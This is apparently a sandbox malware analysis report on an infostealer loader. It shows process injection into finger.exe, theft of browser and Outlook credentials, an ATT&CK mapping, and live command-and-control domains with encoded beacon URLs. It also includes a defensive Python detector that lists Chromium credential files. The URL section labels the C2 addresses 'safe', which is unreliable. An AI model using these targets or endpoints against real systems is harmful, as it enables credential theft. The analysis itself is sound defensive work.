                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation (6 identical events)
Source: C:\Users\user\Desktop\QmBbqpEHu0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography, value MachineGuid

MachineGuid is a per-installation identifier; reading it is the usual way a sample derives a stable victim ID for its beacons, so the read itself is worth a detection rule only in combination with the other behaviour, since legitimate .NET and licensing code reads it too.

Stealing of Sensitive Information

Source: Yara match | File source: 4.2.QmBbqpEHu0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.QmBbqpEHu0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2286547549.0000000002840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\finger.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

The process doing the reading is finger.exe, a built-in Windows network client that has no legitimate reason to open browser or mail credential stores; the code acting here was injected into it (see the behavior graph below). That is why the useful detection key is the pairing of a non-browser image with these targets, not the file paths on their own. Local State holds the DPAPI-protected key that unlocks Login Data and Cookies, so opening it alongside the databases is consistent with in-place decryption rather than a plain file copy.
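The detection logic implied by the events above, as an added example that is not part of the Joe Sandbox report: it classifies (process, action, target) events and flags any non-browser image that opens a Chromium credential store or the Outlook MAPI profile key. The event format, the function names and the inclusion of Brave as a third Chromium profile root are this example's own assumptions; the sample events are constructed from the paths the report lists, plus two benign events to show what is ignored.

```python
"""Flag credential-store access by processes that have no business doing it."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Files under <browser>\User Data\<profile>\ that hold secrets: saved logins,
# cookies, autofill data, and (Local State) the DPAPI-wrapped key that
# decrypts the other three.
CHROMIUM_SECRET_FILES = {"login data", "cookies", "web data", "local state"}

# MAPI profile store under which Outlook keeps account settings and credentials.
OUTLOOK_PROFILE_KEY = (
    r"software\microsoft\windows nt\currentversion"
    r"\windows messaging subsystem\profiles"
)

# Images that legitimately open these stores; everything else is suspect.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}

# Chromium profile roots (assumption: Brave added beyond the report's Chrome/Edge).
_CHROMIUM_ROOT = re.compile(
    r"\\(google\\chrome|microsoft\\edge|bravesoftware\\brave-browser)\\user data\\",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Event:
    process: str  # full image path of the acting process
    action: str   # "file_open" or "key_open"
    target: str   # file path or registry key


def classify(ev: Event) -> Optional[str]:
    """Return a finding label, or None when the event is benign."""
    image = ev.process.rsplit("\\", 1)[-1].lower()
    if image in BROWSER_IMAGES:
        return None
    target = ev.target.lower()
    if ev.action == "file_open" and _CHROMIUM_ROOT.search(target):
        name = target.rsplit("\\", 1)[-1]
        if name in CHROMIUM_SECRET_FILES:
            return f"browser-credential-store-access:{name}"
    if ev.action == "key_open" and OUTLOOK_PROFILE_KEY in target:
        return "outlook-profile-access"
    return None


def findings(events: List[Event]) -> Dict[str, List[str]]:
    """Group labels by acting process so one injected LOLBin surfaces as one cluster."""
    out: Dict[str, List[str]] = {}
    for ev in events:
        label = classify(ev)
        if label:
            out.setdefault(ev.process, []).append(label)
    return out


FINGER = r"C:\Windows\SysWOW64\finger.exe"
CHROME_DATA = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default"
EDGE_DATA = r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default"

# Constructed sample: the finger.exe events from the report plus two benign
# events (PowerShell opening a catalog file, Chrome opening its own store).
SAMPLE_EVENTS = [
    Event(FINGER, "file_open", CHROME_DATA + r"\Cookies"),
    Event(FINGER, "file_open", CHROME_DATA + r"\Network\Cookies"),
    Event(FINGER, "file_open", EDGE_DATA + r"\Network\Cookies"),
    Event(FINGER, "file_open", CHROME_DATA + r"\Login Data"),
    Event(FINGER, "file_open", EDGE_DATA + r"\Login Data"),
    Event(FINGER, "file_open", CHROME_DATA + r"\Network\Local State"),
    Event(FINGER, "file_open", CHROME_DATA + r"\Local State"),
    Event(FINGER, "file_open", CHROME_DATA + r"\Web Data"),
    Event(FINGER, "key_open",
          "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
          "\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
    Event(r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", "file_open",
          r"C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}"
          r"\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat"),
    Event(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file_open",
          CHROME_DATA + r"\Login Data"),
]


def run_sample() -> Dict[str, List[str]]:
    """Run the detector over the constructed events."""
    return findings(SAMPLE_EVENTS)


if __name__ == "__main__":
    for proc, labels in run_sample().items():
        print(proc)
        for label in labels:
            print("   ", label)
```

Only finger.exe surfaces, with nine findings (eight store files and the Outlook key); the PowerShell and Chrome events fall through. In a real pipeline the process field would come from the EDR's image path and the browser allow-list would be keyed on signer, not file name, since a renamed copy of the malware could otherwise call itself chrome.exe.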

Remote Access Functionality

Source: Yara match | File source: 4.2.QmBbqpEHu0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.QmBbqpEHu0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2286547549.0000000002840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques that carry a signature-hit badge in the matrix, grouped by tactic (bracketed figures are the badge text on the cell):

• Persistence: DLL Side-Loading [1]
• Privilege Escalation: Process Injection [412]; Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]
• Defense Evasion: Masquerading [1]; Disable or Modify Tools [11]; Virtualization/Sandbox Evasion [41]; Process Injection [412]; Deobfuscate/Decode Files or Information [1]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [4]; Software Packing [2]; DLL Side-Loading [1]
• Credential Access: OS Credential Dumping [1]
• Discovery: Security Software Discovery [121]; Process Discovery [2]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]; File and Directory Discovery [2]; System Information Discovery [113]
• Collection: Email Collection [1]; Archive Collected Data [1]; Data from Local System [1]
• Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [4]; Application Layer Protocol [4]

The Reconnaissance, Resource Development, Initial Access, Execution, Lateral Movement, Exfiltration and Impact columns carry no badge; the remaining cells of the grid are the unmatched techniques of the standard ATT&CK matrix.
Behavior Graph (ID 1587945, sample QmBbqpEHu0.exe, start date 10/01/2025, architecture WINDOWS, score 100)

Network contacts from the start node: www.sssvip2.shop, www.hsa.world and 7 other IPs or domains.
Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 5 other signatures.

Process tree:

• QmBbqpEHu0.exe (started)
  dropped: C:\Users\user\AppData\...\QmBbqpEHu0.exe.log (ASCII)
  signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  • QmBbqpEHu0.exe (started)
    signature: Maps a DLL or memory area into another process
    • cqvjCApYGBKzop.exe (injected)
      signature: Found direct / indirect Syscall (likely to bypass EDR)
      • finger.exe (started)
        signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        • cqvjCApYGBKzop.exe (injected)
          network: dutchdubliners.online 37.97.254.27, ports 50017, 50018, 50019 (TRANSIP-AS, Amsterdam, Netherlands); www.allstary.top 199.193.6.134, ports 50021, 50022, 50023 (NAMECHEAP-NET, United States); 4 other IPs or domains
          signature: Found direct / indirect Syscall (likely to bypass EDR)
        • firefox.exe (started)
  • powershell.exe (started)
    signature: Loading BitLocker PowerShell Module
    • WmiPrvSE.exe (started)
    • conhost.exe (started)



Antivirus, machine learning and reputation results for the sample

Source | Detection | Scanner | Label
QmBbqpEHu0.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.RedLineStealer
QmBbqpEHu0.exe | 63% | Virustotal | (link to the VirusTotal entry)
QmBbqpEHu0.exe | 100% | Avira | HEUR/AGEN.1362915
QmBbqpEHu0.exe | 100% | Joe Sandbox ML | (machine-learning verdict)

The static results agree that the file is malicious but not on what it is: ReversingLabs names RedLineStealer, Avira reports only a generic heuristic. The ByteCode-MSIL prefix says this is a .NET loader, and such loaders are reused across payload families, so a family name taken from a static scan of the outer file should be treated as provisional. The runtime evidence in this report (injection into finger.exe, browser and Outlook credential access, several C2 hosts contacted with an identical URI shape) is the firmer basis for classification.
                No Antivirus matches
URL reputation results

Every URL below was checked against Avira URL Cloud and returned 0% detection with the label "safe":

• https://www.transip.eu/question/110000577/
• https://www.transip.eu/knowledgebase/zoeken/
• http://www.dutchdubliners.online/7ujc/
• https://www.transip.eu/services/search-domains/
• https://www.transip.eu/knowledgebase/entry/5885/
• http://www.comect.online
• http://www.allstary.top/rdvg/
• http://www.allstary.top/rdvg/?EzZ=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&BjRxb=8r70fhQxdN4lRB
• http://www.hsa.world/09b7/
• http://www.dutchdubliners.online/7ujc/?EzZ=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&BjRxb=8r70fhQxdN4lRB
• http://www.sssvip2.shop/6t0f/
• http://www.comect.online/hmf8/
• https://www.transip.eu/question/100000230
• https://www.transip.eu/privacy-policy/
• http://www.hsa.world/09b7/?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRB
